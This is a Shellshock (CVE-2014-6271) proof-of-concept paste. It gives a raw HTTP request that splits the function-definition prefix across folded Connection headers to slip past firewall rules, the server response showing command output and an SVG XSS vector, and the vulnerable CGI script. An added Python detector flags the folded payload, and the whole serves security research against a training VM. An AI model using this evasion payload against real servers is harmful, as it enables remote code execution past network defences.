~~ CVE-2014-6271 PoC by Using HTTP Header Pollution (HHP) to Bypass Some Firewall Rules ~~
By Soroush Dalili (@irsdl)
Based on a vulnerable sample - VM downloadable from http://files.pentesterlab.com/cve-2014-6271/cve-2014-6271.iso
Note 1: Space characters are important
Note 2: It can also hide other vectors such as "'<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('1')' '>' " - just interesting
Note 3: Look at "<<WHY? Look @ ENV>> " in the request and "Look @ ENV >> , <<WHY? & WHY?" in the response - also interesting
Note 4: Didn't have any actual live firewall to test this on a live product!!!
[Request:]
------------
GET /cgi-bin/status HTTP/1.1
HOST: test
Connection:
()
{<<WHY? Look @ ENV>>
abcd: A
Connection: &};echo "
abcd: B
Connection: GoesToResponseBody"'<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('1')' '>' "
abcd: C
Connection: "&echo
-e "GoesToResponseHeader\x3a@IRSDL"
------------
[Response:]
------------
HTTP/1.1 200 OK
Date: Fri, 26 Sep 2014 00:51:50 GMT
Server: Apache/2.2.21 (Unix) DAV/2
GoesToResponseHeader: @IRSDL
Content-Type: application/json
Content-Length: 859
, GoesToResponseBody<svg onload=alert(1) > ,
{ "uptime": " 00:51:50 up 12:09, 1 users, load average: 0.00, 0.01, 0.04", "kernel": "Linux vulnerable 3.14.1-pentesterlab #1 SMP Sun Jul 6 09:16:00 EST 2014 i686 GNU/Linux"}
SERVER_SIGNATURE= HTTP_ABCD=A, B, C UNIQUE_ID=VCS4pn8AAAEAAANqBIIAAACU SERVER_PORT=80 HTTP_HOST=test DOCUMENT_ROOT=/var/www/ SCRIPT_FILENAME=/var/www/cgi-bin/status REQUEST_URI=/cgi-bin/status SCRIPT_NAME=/cgi-bin/status REMOTE_PORT=38403 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/usr/sbin:/bin:/usr/bin PWD=/var/www/cgi-bin SERVER_ADMIN=louis@pentesterlab.com REMOTE_ADDR=192.168.1.1 SHLVL=1 SERVER_NAME=test SERVER_SOFTWARE=Apache/2.2.21 (Unix) DAV/2 QUERY_STRING= SERVER_ADDR=192.168.1.132 GATEWAY_INTERFACE=CGI/1.1 SERVER_PROTOCOL=HTTP/1.1 REQUEST_METHOD=GET HTTP_CONNECTION=() { Look @ ENV >> , <<WHY? & WHY? } _=/usr/bin/env
------------
[cgi-bin/status source code:]
------------
#!/bin/bash
# CGI header section, then the blank line that ends the headers
echo "Content-Type: application/json"
echo ""
# Body: the backticks run the commands in the bash that inherited the HTTP_* environment
echo '{ "uptime": "'`uptime`'", "kernel": "'`uname -a`'"} '
# the rest added
echo ""
# Unquoted, so the whole environment is printed on a single line
echo $(env)
------------
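Added example, not part of the paste or the author's PoC: a Python check that rebuilds a raw request the way the CGI gateway builds its HTTP_* variables (obs-fold continuation lines joined with one space, which is an assumption, and repeated header names merged with ", " as HTTP_ABCD=A, B, C shows), then looks for the "() {" prefix on the folded value. A per-physical-line rule misses the constructed split sample; the folded check flags it.

```python
import re

# A bash vulnerable to CVE-2014-6271 treats any environment value that starts
# with "() {" as a function definition and runs whatever follows the "}".
SHELLSHOCK_RE = re.compile(r"^\(\)\s*\{")

def fold_headers(raw_request: str) -> dict:
    """Rebuild the HTTP_* environment a CGI gateway hands to the script:
    obs-fold continuation lines (leading SP/HTAB) are joined to the previous
    header with one space (assumption), and repeated header names are merged
    with ", " (the rule behind HTTP_ABCD=A, B, C in the paste)."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    logical = []
    for line in head.split("\r\n")[1:]:  # skip the request line
        if line[:1] in (" ", "\t") and logical:
            logical[-1] += " " + line.strip()
        elif ":" in line:
            logical.append(line)
    env = {}
    for line in logical:
        name, value = line.split(":", 1)
        key = "HTTP_" + name.strip().upper().replace("-", "_")
        value = value.strip()
        env[key] = value if key not in env else env[key] + ", " + value
    return env

def naive_line_check(raw_request: str) -> bool:
    """A per-physical-line signature: what a simple filter rule sees."""
    return any(SHELLSHOCK_RE.match(line.split(":", 1)[-1].strip())
               for line in raw_request.split("\r\n"))

def folded_check(raw_request: str) -> list:
    """Names of environment variables whose folded value would be imported."""
    return [k for k, v in fold_headers(raw_request).items()
            if SHELLSHOCK_RE.match(v)]

# Constructed sample: the paste's layout reduced to its skeleton. No physical
# line contains "() {", yet the folded HTTP_CONNECTION value begins with it.
POLLUTED = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: test\r\n"
    "Connection:\r\n"
    " ()\r\n"
    " { :;\r\n"
    "Abcd: A\r\n"
    "Connection: &}; echo vulnerable\r\n"
    "Abcd: B\r\n"
    "\r\n"
)
```

Running `naive_line_check(POLLUTED)` gives False while `folded_check(POLLUTED)` returns `['HTTP_CONNECTION']`, so a rule that inspects header values only after folding is the one that matches what the vulnerable bash actually receives.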